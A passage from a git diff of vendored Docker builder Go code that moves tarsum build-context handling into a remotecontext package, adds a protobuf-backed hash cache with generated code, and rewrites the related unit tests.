contextDir, DefaultDockerfileName, dockerfileContents, 0777) +func TestDownloadRemote(t *testing.T) { + contextDir := fs.NewDir(t, "test-builder-download-remote", + fs.WithFile(builder.DefaultDockerfileName, dockerfileContents)) + defer contextDir.Remove() mux := http.NewServeMux() server := httptest.NewServer(mux) serverURL, _ := url.Parse(server.URL) - serverURL.Path = "/" + DefaultDockerfileName + serverURL.Path = "/" + builder.DefaultDockerfileName remoteURL := serverURL.String() - mux.Handle("/", http.FileServer(http.Dir(contextDir))) + mux.Handle("/", http.FileServer(http.Dir(contextDir.Path()))) - remoteContext, err := MakeRemoteContext(remoteURL, map[string]func(io.ReadCloser) (io.ReadCloser, error){ - httputils.MimeTypes.TextPlain: func(rc io.ReadCloser) (io.ReadCloser, error) { - dockerfile, err := ioutil.ReadAll(rc) - if err != nil { - return nil, err - } + contentType, content, err := downloadRemote(remoteURL) + assert.NilError(t, err) - r, err := archive.Generate(DefaultDockerfileName, string(dockerfile)) - if err != nil { - return nil, err - } - return ioutil.NopCloser(r), nil - }, - }) - - if err != nil { - t.Fatalf("Error when executing DetectContextFromRemoteURL: %s", err) - } - - if remoteContext == nil { - t.Fatalf("Remote context should not be nil") - } - - tarSumCtx, ok := remoteContext.(*tarSumContext) - - if !ok { - t.Fatalf("Cast error, remote context should be casted to tarSumContext") - } - - fileInfoSums := tarSumCtx.sums + assert.Check(t, is.Equal(mimeTypes.TextPlain, contentType)) + raw, err := ioutil.ReadAll(content) + assert.NilError(t, err) + assert.Check(t, is.Equal(dockerfileContents, string(raw))) +} - if fileInfoSums.Len() != 1 { - t.Fatalf("Size of file info sums should be 1, got: %d", fileInfoSums.Len()) +func TestGetWithStatusError(t *testing.T) { + var testcases = []struct { + err error + statusCode int + expectedErr string + expectedBody string + }{ + { + statusCode: 200, + expectedBody: "THE BODY", + }, + { + statusCode: 400, + expectedErr: "with status 400 Bad Request: broke", + expectedBody: "broke", + }, } - - fileInfo := fileInfoSums.GetFile(DefaultDockerfileName) - - if fileInfo == nil { - t.Fatalf("There should be file named %s in fileInfoSums", DefaultDockerfileName) + for _, testcase := range testcases { + ts := httptest.NewServer( + http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + buffer := bytes.NewBufferString(testcase.expectedBody) + w.WriteHeader(testcase.statusCode) + w.Write(buffer.Bytes()) + }), + ) + defer ts.Close() + response, err := GetWithStatusError(ts.URL) + + if testcase.expectedErr == "" { + assert.NilError(t, err) + + body, err := readBody(response.Body) + assert.NilError(t, err) + assert.Check(t, is.Contains(string(body), testcase.expectedBody)) + } else { + assert.Check(t, is.ErrorContains(err, testcase.expectedErr)) + } } +} - if fileInfo.Pos() != 0 { - t.Fatalf("File %s should have position 0, got %d", DefaultDockerfileName, fileInfo.Pos()) - } +func readBody(b io.ReadCloser) ([]byte, error) { + defer b.Close() + return ioutil.ReadAll(b) } diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go new file mode 100644 index 0000000000..b809cfb78b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.go @@ -0,0 +1,157 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "os" + "sync" + + "github.com/docker/docker/pkg/containerfs" + iradix "github.com/hashicorp/go-immutable-radix" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/tonistiigi/fsutil" +) + +type hashed interface { + Digest() digest.Digest +} + +// CachableSource is a source that contains cache records for its contents +type CachableSource struct { + mu sync.Mutex + root containerfs.ContainerFS + tree *iradix.Tree + txn *iradix.Txn +} + +// NewCachableSource creates new CachableSource +func NewCachableSource(root string) *CachableSource { + ts := &CachableSource{ + tree: iradix.New(), + root: containerfs.NewLocalContainerFS(root), + } + return ts +} + +// MarshalBinary marshals current cache information to a byte array +func (cs *CachableSource) MarshalBinary() ([]byte, error) { + b := TarsumBackup{Hashes: make(map[string]string)} + root := cs.getRoot() + root.Walk(func(k []byte, v interface{}) bool { + b.Hashes[string(k)] = v.(*fileInfo).sum + return false + }) + return b.Marshal() +} + +// UnmarshalBinary decodes cache information for presented byte array +func (cs *CachableSource) UnmarshalBinary(data []byte) error { + var b TarsumBackup + if err := b.Unmarshal(data); err != nil { + return err + } + txn := iradix.New().Txn() + for p, v := range b.Hashes { + txn.Insert([]byte(p), &fileInfo{sum: v}) + } + cs.mu.Lock() + defer cs.mu.Unlock() + cs.tree = txn.Commit() + return nil +} + +// Scan rescans the cache information from the file system +func (cs *CachableSource) Scan() error { + lc, err := NewLazySource(cs.root) + if err != nil { + return err + } + txn := iradix.New().Txn() + err = cs.root.Walk(cs.root.Path(), func(path string, info os.FileInfo, err error) error { + if err != nil { + return errors.Wrapf(err, "failed to walk %s", path) + } + rel, err := Rel(cs.root, path) + if err != nil { + return err + } + h, err := lc.Hash(rel) + if err != nil { + return err + } + txn.Insert([]byte(rel), &fileInfo{sum: h}) + return nil + }) + if err != nil { + return err + } + cs.mu.Lock() + defer cs.mu.Unlock() + cs.tree = txn.Commit() + return nil +} + +// HandleChange notifies the source about a modification operation +func (cs *CachableSource) HandleChange(kind fsutil.ChangeKind, p string, fi os.FileInfo, err error) (retErr error) { + cs.mu.Lock() + if cs.txn == nil { + cs.txn = cs.tree.Txn() + } + if kind == fsutil.ChangeKindDelete { + cs.txn.Delete([]byte(p)) + cs.mu.Unlock() + return + } + + h, ok := fi.(hashed) + if !ok { + cs.mu.Unlock() + return errors.Errorf("invalid fileinfo: %s", p) + } + + hfi := &fileInfo{ + sum: h.Digest().Hex(), + } + cs.txn.Insert([]byte(p), hfi) + cs.mu.Unlock() + return nil +} + +func (cs *CachableSource) getRoot() *iradix.Node { + cs.mu.Lock() + if cs.txn != nil { + cs.tree = cs.txn.Commit() + cs.txn = nil + } + t := cs.tree + cs.mu.Unlock() + return t.Root() +} + +// Close closes the source +func (cs *CachableSource) Close() error { + return nil +} + +// Hash returns a hash for a single file in the source +func (cs *CachableSource) Hash(path string) (string, error) { + n := cs.getRoot() + // TODO: check this for symlinks + v, ok := n.Get([]byte(path)) + if !ok { + return path, nil + } + return v.(*fileInfo).sum, nil +} + +// Root returns a root directory for the source +func (cs *CachableSource) Root() containerfs.ContainerFS { + return cs.root +} + +type fileInfo struct { + sum string +} + +func (fi *fileInfo) Hash() string { + return fi.sum +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go new file mode 100644 index 0000000000..1d23bbe65b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go @@ -0,0 +1,525 @@ +// Code generated by protoc-gen-gogo. +// source: tarsum.proto +// DO NOT EDIT! + +/* +Package remotecontext is a generated protocol buffer package. + +It is generated from these files: + tarsum.proto + +It has these top-level messages: + TarsumBackup +*/ +package remotecontext + +import proto "github.com/gogo/protobuf/proto" +import fmt "fmt" +import math "math" + +import strings "strings" +import reflect "reflect" +import github_com_gogo_protobuf_sortkeys "github.com/gogo/protobuf/sortkeys" + +import io "io" + +// Reference imports to suppress errors if they are not otherwise used. +var _ = proto.Marshal +var _ = fmt.Errorf +var _ = math.Inf + +// This is a compile-time assertion to ensure that this generated file +// is compatible with the proto package it is being compiled against. +// A compilation error at this line likely means your copy of the +// proto package needs to be updated. +const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package + +type TarsumBackup struct { + Hashes map[string]string `protobuf:"bytes,1,rep,name=Hashes" json:"Hashes,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` +} + +func (m *TarsumBackup) Reset() { *m = TarsumBackup{} } +func (*TarsumBackup) ProtoMessage() {} +func (*TarsumBackup) Descriptor() ([]byte, []int) { return fileDescriptorTarsum, []int{0} } + +func (m *TarsumBackup) GetHashes() map[string]string { + if m != nil { + return m.Hashes + } + return nil +} + +func init() { + proto.RegisterType((*TarsumBackup)(nil), "remotecontext.TarsumBackup") +} +func (this *TarsumBackup) Equal(that interface{}) bool { + if that == nil { + if this == nil { + return true + } + return false + } + + that1, ok := that.(*TarsumBackup) + if !ok { + that2, ok := that.(TarsumBackup) + if ok { + that1 = &that2 + } else { + return false + } + } + if that1 == nil { + if this == nil { + return true + } + return false + } else if this == nil { + return false + } + if len(this.Hashes) != len(that1.Hashes) { + return false + } + for i := range this.Hashes { + if this.Hashes[i] != that1.Hashes[i] { + return false + } + } + return true +} +func (this *TarsumBackup) GoString() string { + if this == nil { + return "nil" + } + s := make([]string, 0, 5) + s = append(s, "&remotecontext.TarsumBackup{") + keysForHashes := make([]string, 0, len(this.Hashes)) + for k := range this.Hashes { + keysForHashes = append(keysForHashes, k) + } + github_com_gogo_protobuf_sortkeys.Strings(keysForHashes) + mapStringForHashes := "map[string]string{" + for _, k := range keysForHashes { + mapStringForHashes += fmt.Sprintf("%#v: %#v,", k, this.Hashes[k]) + } + mapStringForHashes += "}" + if this.Hashes != nil { + s = append(s, "Hashes: "+mapStringForHashes+",\n") + } + s = append(s, "}") + return strings.Join(s, "") +} +func valueToGoStringTarsum(v interface{}, typ string) string { + rv := reflect.ValueOf(v) + if rv.IsNil() { + return "nil" + } + pv := reflect.Indirect(rv).Interface() + return fmt.Sprintf("func(v %v) *%v { return &v } ( %#v )", typ, typ, pv) +} +func (m *TarsumBackup) Marshal() (dAtA []byte, err error) { + size := m.Size() + dAtA = make([]byte, size) + n, err := m.MarshalTo(dAtA) + if err != nil { + return nil, err + } + return dAtA[:n], nil +} + +func (m *TarsumBackup) MarshalTo(dAtA []byte) (int, error) { + var i int + _ = i + var l int + _ = l + if len(m.Hashes) > 0 { + for k := range m.Hashes { + dAtA[i] = 0xa + i++ + v := m.Hashes[k] + mapSize := 1 + len(k) + sovTarsum(uint64(len(k))) + 1 + len(v) + sovTarsum(uint64(len(v))) + i = encodeVarintTarsum(dAtA, i, uint64(mapSize)) + dAtA[i] = 0xa + i++ + i = encodeVarintTarsum(dAtA, i, uint64(len(k))) + i += copy(dAtA[i:], k) + dAtA[i] = 0x12 + i++ + i = encodeVarintTarsum(dAtA, i, uint64(len(v))) + i += copy(dAtA[i:], v) + } + } + return i, nil +} + +func encodeFixed64Tarsum(dAtA []byte, offset int, v uint64) int { + dAtA[offset] = uint8(v) + dAtA[offset+1] = uint8(v >> 8) + dAtA[offset+2] = uint8(v >> 16) + dAtA[offset+3] = uint8(v >> 24) + dAtA[offset+4] = uint8(v >> 32) + dAtA[offset+5] = uint8(v >> 40) + dAtA[offset+6] = uint8(v >> 48) + dAtA[offset+7] = uint8(v >> 56) + return offset + 8 +} +func encodeFixed32Tarsum(dAtA []byte, offset int, v uint32) int { + dAtA[offset] = uint8(v) + dAtA[offset+1] = uint8(v >> 8) + dAtA[offset+2] = uint8(v >> 16) + dAtA[offset+3] = uint8(v >> 24) + return offset + 4 +} +func encodeVarintTarsum(dAtA []byte, offset int, v uint64) int { + for v >= 1<<7 { + dAtA[offset] = uint8(v&0x7f | 0x80) + v >>= 7 + offset++ + } + dAtA[offset] = uint8(v) + return offset + 1 +} +func (m *TarsumBackup) Size() (n int) { + var l int + _ = l + if len(m.Hashes) > 0 { + for k, v := range m.Hashes { + _ = k + _ = v + mapEntrySize := 1 + len(k) + sovTarsum(uint64(len(k))) + 1 + len(v) + sovTarsum(uint64(len(v))) + n += mapEntrySize + 1 + sovTarsum(uint64(mapEntrySize)) + } + } + return n +} + +func sovTarsum(x uint64) (n int) { + for { + n++ + x >>= 7 + if x == 0 { + break + } + } + return n +} +func sozTarsum(x uint64) (n int) { + return sovTarsum(uint64((x << 1) ^ uint64((int64(x) >> 63)))) +} +func (this *TarsumBackup) String() string { + if this == nil { + return "nil" + } + keysForHashes := make([]string, 0, len(this.Hashes)) + for k := range this.Hashes { + keysForHashes = append(keysForHashes, k) + } + github_com_gogo_protobuf_sortkeys.Strings(keysForHashes) + mapStringForHashes := "map[string]string{" + for _, k := range keysForHashes { + mapStringForHashes += fmt.Sprintf("%v: %v,", k, this.Hashes[k]) + } + mapStringForHashes += "}" + s := strings.Join([]string{`&TarsumBackup{`, + `Hashes:` + mapStringForHashes + `,`, + `}`, + }, "") + return s +} +func valueToStringTarsum(v interface{}) string { + rv := reflect.ValueOf(v) + if rv.IsNil() { + return "nil" + } + pv := reflect.Indirect(rv).Interface() + return fmt.Sprintf("*%v", pv) +} +func (m *TarsumBackup) Unmarshal(dAtA []byte) error { + l := len(dAtA) + iNdEx := 0 + for iNdEx < l { + preIndex := iNdEx + var wire uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + wire |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + fieldNum := int32(wire >> 3) + wireType := int(wire & 0x7) + if wireType == 4 { + return fmt.Errorf("proto: TarsumBackup: wiretype end group for non-group") + } + if fieldNum <= 0 { + return fmt.Errorf("proto: TarsumBackup: illegal tag %d (wire type %d)", fieldNum, wire) + } + switch fieldNum { + case 1: + if wireType != 2 { + return fmt.Errorf("proto: wrong wireType = %d for field Hashes", wireType) + } + var msglen int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + msglen |= (int(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + if msglen < 0 { + return ErrInvalidLengthTarsum + } + postIndex := iNdEx + msglen + if postIndex > l { + return io.ErrUnexpectedEOF + } + var keykey uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + keykey |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + var stringLenmapkey uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLenmapkey |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + intStringLenmapkey := int(stringLenmapkey) + if intStringLenmapkey < 0 { + return ErrInvalidLengthTarsum + } + postStringIndexmapkey := iNdEx + intStringLenmapkey + if postStringIndexmapkey > l { + return io.ErrUnexpectedEOF + } + mapkey := string(dAtA[iNdEx:postStringIndexmapkey]) + iNdEx = postStringIndexmapkey + if m.Hashes == nil { + m.Hashes = make(map[string]string) + } + if iNdEx < postIndex { + var valuekey uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + valuekey |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + var stringLenmapvalue uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return ErrIntOverflowTarsum + } + if iNdEx >= l { + return io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + stringLenmapvalue |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + intStringLenmapvalue := int(stringLenmapvalue) + if intStringLenmapvalue < 0 { + return ErrInvalidLengthTarsum + } + postStringIndexmapvalue := iNdEx + intStringLenmapvalue + if postStringIndexmapvalue > l { + return io.ErrUnexpectedEOF + } + mapvalue := string(dAtA[iNdEx:postStringIndexmapvalue]) + iNdEx = postStringIndexmapvalue + m.Hashes[mapkey] = mapvalue + } else { + var mapvalue string + m.Hashes[mapkey] = mapvalue + } + iNdEx = postIndex + default: + iNdEx = preIndex + skippy, err := skipTarsum(dAtA[iNdEx:]) + if err != nil { + return err + } + if skippy < 0 { + return ErrInvalidLengthTarsum + } + if (iNdEx + skippy) > l { + return io.ErrUnexpectedEOF + } + iNdEx += skippy + } + } + + if iNdEx > l { + return io.ErrUnexpectedEOF + } + return nil +} +func skipTarsum(dAtA []byte) (n int, err error) { + l := len(dAtA) + iNdEx := 0 + for iNdEx < l { + var wire uint64 + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + wire |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + wireType := int(wire & 0x7) + switch wireType { + case 0: + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + iNdEx++ + if dAtA[iNdEx-1] < 0x80 { + break + } + } + return iNdEx, nil + case 1: + iNdEx += 8 + return iNdEx, nil + case 2: + var length int + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + length |= (int(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + iNdEx += length + if length < 0 { + return 0, ErrInvalidLengthTarsum + } + return iNdEx, nil + case 3: + for { + var innerWire uint64 + var start int = iNdEx + for shift := uint(0); ; shift += 7 { + if shift >= 64 { + return 0, ErrIntOverflowTarsum + } + if iNdEx >= l { + return 0, io.ErrUnexpectedEOF + } + b := dAtA[iNdEx] + iNdEx++ + innerWire |= (uint64(b) & 0x7F) << shift + if b < 0x80 { + break + } + } + innerWireType := int(innerWire & 0x7) + if innerWireType == 4 { + break + } + next, err := skipTarsum(dAtA[start:]) + if err != nil { + return 0, err + } + iNdEx = start + next + } + return iNdEx, nil + case 4: + return iNdEx, nil + case 5: + iNdEx += 4 + return iNdEx, nil + default: + return 0, fmt.Errorf("proto: illegal wireType %d", wireType) + } + } + panic("unreachable") +} + +var ( + ErrInvalidLengthTarsum = fmt.Errorf("proto: negative length found during unmarshaling") + ErrIntOverflowTarsum = fmt.Errorf("proto: integer overflow") +) + +func init() { proto.RegisterFile("tarsum.proto", fileDescriptorTarsum) } + +var fileDescriptorTarsum = []byte{ + // 196 bytes of a gzipped FileDescriptorProto + 0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x29, 0x49, 0x2c, 0x2a, + 0x2e, 0xcd, 0xd5, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x17, 0xe2, 0x2d, 0x4a, 0xcd, 0xcd, 0x2f, 0x49, + 0x4d, 0xce, 0xcf, 0x2b, 0x49, 0xad, 0x28, 0x51, 0xea, 0x62, 0xe4, 0xe2, 0x09, 0x01, 0xcb, 0x3b, + 0x25, 0x26, 0x67, 0x97, 0x16, 0x08, 0xd9, 0x73, 0xb1, 0x79, 0x24, 0x16, 0x67, 0xa4, 0x16, 0x4b, + 0x30, 0x2a, 0x30, 0x6b, 0x70, 0x1b, 0xa9, 0xeb, 0xa1, 0x68, 0xd0, 0x43, 0x56, 0xac, 0x07, 0x51, + 0xe9, 0x9a, 0x57, 0x52, 0x54, 0x19, 0x04, 0xd5, 0x26, 0x65, 0xc9, 0xc5, 0x8d, 0x24, 0x2c, 0x24, + 0xc0, 0xc5, 0x9c, 0x9d, 0x5a, 0x29, 0xc1, 0xa8, 0xc0, 0xa8, 0xc1, 0x19, 0x04, 0x62, 0x0a, 0x89, + 0x70, 0xb1, 0x96, 0x25, 0xe6, 0x94, 0xa6, 0x4a, 0x30, 0x81, 0xc5, 0x20, 0x1c, 0x2b, 0x26, 0x0b, + 0x46, 0x27, 0x9d, 0x0b, 0x0f, 0xe5, 0x18, 0x6e, 0x3c, 0x94, 0x63, 0xf8, 0xf0, 0x50, 0x8e, 0xb1, + 0xe1, 0x91, 0x1c, 0xe3, 0x8a, 0x47, 0x72, 0x8c, 0x27, 0x1e, 0xc9, 0x31, 0x5e, 0x78, 0x24, 0xc7, + 0xf8, 0xe0, 0x91, 0x1c, 0xe3, 0x8b, 0x47, 0x72, 0x0c, 0x1f, 0x1e, 0xc9, 0x31, 0x4e, 0x78, 0x2c, + 0xc7, 0x90, 0xc4, 0x06, 0xf6, 0x90, 0x31, 0x20, 0x00, 0x00, 0xff, 0xff, 0x89, 0x57, 0x7d, 0x3f, + 0xe0, 0x00, 0x00, 0x00, +} diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto new file mode 100644 index 0000000000..cb94240ba8 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto @@ -0,0 +1,7 @@ +syntax = "proto3"; + +package remotecontext; // no namespace because only used internally + +message TarsumBackup { + map Hashes = 1; +} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go new file mode 100644 index 0000000000..46f128d9f0 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go @@ -0,0 +1,151 @@ +package remotecontext // import "github.com/docker/docker/builder/remotecontext" + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/reexec" + "github.com/pkg/errors" + "gotest.tools/skip" +) + +const ( + filename = "test" + contents = "contents test" +) + +func init() { + reexec.Init() +} + +func TestCloseRootDirectory(t *testing.T) { + contextDir, err := ioutil.TempDir("", "builder-tarsum-test") + defer os.RemoveAll(contextDir) + if err != nil { + t.Fatalf("Error with creating temporary directory: %s", err) + } + + src := makeTestArchiveContext(t, contextDir) + err = src.Close() + + if err != nil { + t.Fatalf("Error while executing Close: %s", err) + } + + _, err = os.Stat(src.Root().Path()) + + if !os.IsNotExist(err) { + t.Fatal("Directory should not exist at this point") + } +} + +func TestHashFile(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + createTestTempFile(t, contextDir, filename, contents, 0755) + + tarSum := makeTestArchiveContext(t, contextDir) + + sum, err := tarSum.Hash(filename) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if len(sum) == 0 { + t.Fatalf("Hash returned empty sum") + } + + expected := "1149ab94af7be6cc1da1335e398f24ee1cf4926b720044d229969dfc248ae7ec" + + if actual := sum; expected != actual { + t.Fatalf("invalid checksum. expected %s, got %s", expected, actual) + } +} + +func TestHashSubdir(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := filepath.Join(contextDir, "builder-tarsum-test-subdir") + err := os.Mkdir(contextSubdir, 0755) + if err != nil { + t.Fatalf("Failed to make directory: %s", contextSubdir) + } + + testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0755) + + tarSum := makeTestArchiveContext(t, contextDir) + + relativePath, err := filepath.Rel(contextDir, testFilename) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + sum, err := tarSum.Hash(relativePath) + + if err != nil { + t.Fatalf("Error when executing Stat: %s", err) + } + + if len(sum) == 0 { + t.Fatalf("Hash returned empty sum") + } + + expected := "d7f8d6353dee4816f9134f4156bf6a9d470fdadfb5d89213721f7e86744a4e69" + + if actual := sum; expected != actual { + t.Fatalf("invalid checksum. expected %s, got %s", expected, actual) + } +} + +func TestRemoveDirectory(t *testing.T) { + contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test") + defer cleanup() + + contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir") + + relativePath, err := filepath.Rel(contextDir, contextSubdir) + + if err != nil { + t.Fatalf("Error when getting relative path: %s", err) + } + + src := makeTestArchiveContext(t, contextDir) + + _, err = src.Root().Stat(src.Root().Join(src.Root().Path(), relativePath)) + if err != nil { + t.Fatalf("Statting %s shouldn't fail: %+v", relativePath, err) + } + + tarSum := src.(modifiableContext) + err = tarSum.Remove(relativePath) + if err != nil { + t.Fatalf("Error when executing Remove: %s", err) + } + + _, err = src.Root().Stat(src.Root().Join(src.Root().Path(), relativePath)) + if !os.IsNotExist(errors.Cause(err)) { + t.Fatalf("Directory should not exist at this point: %+v ", err) + } +} + +func makeTestArchiveContext(t *testing.T, dir string) builder.Source { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + tarStream, err := archive.Tar(dir, archive.Uncompressed) + if err != nil { + t.Fatalf("error: %s", err) + } + defer tarStream.Close() + tarSum, err := FromArchive(tarStream) + if err != nil { + t.Fatalf("Error when executing FromArchive: %s", err) + } + return tarSum +} diff --git a/vendor/github.com/docker/docker/builder/utils_test.go b/vendor/github.com/docker/docker/builder/remotecontext/utils_test.go similarity index 66% rename from vendor/github.com/docker/docker/builder/utils_test.go rename to vendor/github.com/docker/docker/builder/remotecontext/utils_test.go index 1101ff1d1d..6a4c707a6e 100644 --- a/vendor/github.com/docker/docker/builder/utils_test.go +++ b/vendor/github.com/docker/docker/builder/remotecontext/utils_test.go @@ -1,4 +1,4 @@ -package builder +package remotecontext // import "github.com/docker/docker/builder/remotecontext" import ( "io/ioutil" @@ -7,12 +7,6 @@ import ( "testing" ) -const ( - dockerfileContents = "FROM busybox" - dockerignoreFilename = ".dockerignore" - testfileContents = "test" -) - // createTestTempDir creates a temporary directory for testing. // It returns the created path and a cleanup function which is meant to be used as deferred call. // When an error occurs, it terminates the test. @@ -59,29 +53,3 @@ func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.Fi return filePath } - -// chdir changes current working directory to dir. -// It returns a function which changes working directory back to the previous one. -// This function is meant to be executed as a deferred call. -// When an error occurs, it terminates the test. -func chdir(t *testing.T, dir string) func() { - workingDirectory, err := os.Getwd() - - if err != nil { - t.Fatalf("Error when retrieving working directory: %s", err) - } - - err = os.Chdir(dir) - - if err != nil { - t.Fatalf("Error when changing directory to %s: %s", dir, err) - } - - return func() { - err = os.Chdir(workingDirectory) - - if err != nil { - t.Fatalf("Error when changing back to working directory (%s): %s", workingDirectory, err) - } - } -} diff --git a/vendor/github.com/docker/docker/builder/tarsum.go b/vendor/github.com/docker/docker/builder/tarsum.go deleted file mode 100644 index 35054dcba1..0000000000 --- a/vendor/github.com/docker/docker/builder/tarsum.go +++ /dev/null @@ -1,158 +0,0 @@ -package builder - -import ( - "fmt" - "io" - "os" - "path/filepath" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/chrootarchive" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/symlink" - "github.com/docker/docker/pkg/tarsum" -) - -type tarSumContext struct { - root string - sums tarsum.FileInfoSums -} - -func (c *tarSumContext) Close() error { - return os.RemoveAll(c.root) -} - -func convertPathError(err error, cleanpath string) error { - if err, ok := err.(*os.PathError); ok { - err.Path = cleanpath - return err - } - return err -} - -func (c *tarSumContext) Open(path string) (io.ReadCloser, error) { - cleanpath, fullpath, err := c.normalize(path) - if err != nil { - return nil, err - } - r, err := os.Open(fullpath) - if err != nil { - return nil, convertPathError(err, cleanpath) - } - return r, nil -} - -func (c *tarSumContext) Stat(path string) (string, FileInfo, error) { - cleanpath, fullpath, err := c.normalize(path) - if err != nil { - return "", nil, err - } - - st, err := os.Lstat(fullpath) - if err != nil { - return "", nil, convertPathError(err, cleanpath) - } - - rel, err := filepath.Rel(c.root, fullpath) - if err != nil { - return "", nil, convertPathError(err, cleanpath) - } - - // We set sum to path by default for the case where GetFile returns nil. - // The usual case is if relative path is empty. - sum := path - // Use the checksum of the followed path(not the possible symlink) because - // this is the file that is actually copied. - if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { - sum = tsInfo.Sum() - } - fi := &HashedFileInfo{PathFileInfo{st, fullpath, filepath.Base(cleanpath)}, sum} - return rel, fi, nil -} - -// MakeTarSumContext returns a build Context from a tar stream. -// -// It extracts the tar stream to a temporary folder that is deleted as soon as -// the Context is closed. -// As the extraction happens, a tarsum is calculated for every file, and the set of -// all those sums then becomes the source of truth for all operations on this Context. -// -// Closing tarStream has to be done by the caller. -func MakeTarSumContext(tarStream io.Reader) (ModifiableContext, error) { - root, err := ioutils.TempDir("", "docker-builder") - if err != nil { - return nil, err - } - - tsc := &tarSumContext{root: root} - - // Make sure we clean-up upon error. In the happy case the caller - // is expected to manage the clean-up - defer func() { - if err != nil { - tsc.Close() - } - }() - - decompressedStream, err := archive.DecompressStream(tarStream) - if err != nil { - return nil, err - } - - sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1) - if err != nil { - return nil, err - } - - if err := chrootarchive.Untar(sum, root, nil); err != nil { - return nil, err - } - - tsc.sums = sum.GetSums() - - return tsc, nil -} - -func (c *tarSumContext) normalize(path string) (cleanpath, fullpath string, err error) { - cleanpath = filepath.Clean(string(os.PathSeparator) + path)[1:] - fullpath, err = symlink.FollowSymlinkInScope(filepath.Join(c.root, path), c.root) - if err != nil { - return "", "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullpath) - } - _, err = os.Lstat(fullpath) - if err != nil { - return "", "", convertPathError(err, path) - } - return -} - -func (c *tarSumContext) Walk(root string, walkFn WalkFunc) error { - root = filepath.Join(c.root, filepath.Join(string(filepath.Separator), root)) - return filepath.Walk(root, func(fullpath string, info os.FileInfo, err error) error { - rel, err := filepath.Rel(c.root, fullpath) - if err != nil { - return err - } - if rel == "." { - return nil - } - - sum := rel - if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil { - sum = tsInfo.Sum() - } - fi := &HashedFileInfo{PathFileInfo{FileInfo: info, FilePath: fullpath}, sum} - if err := walkFn(rel, fi, nil); err != nil { - return err - } - return nil - }) -} - -func (c *tarSumContext) 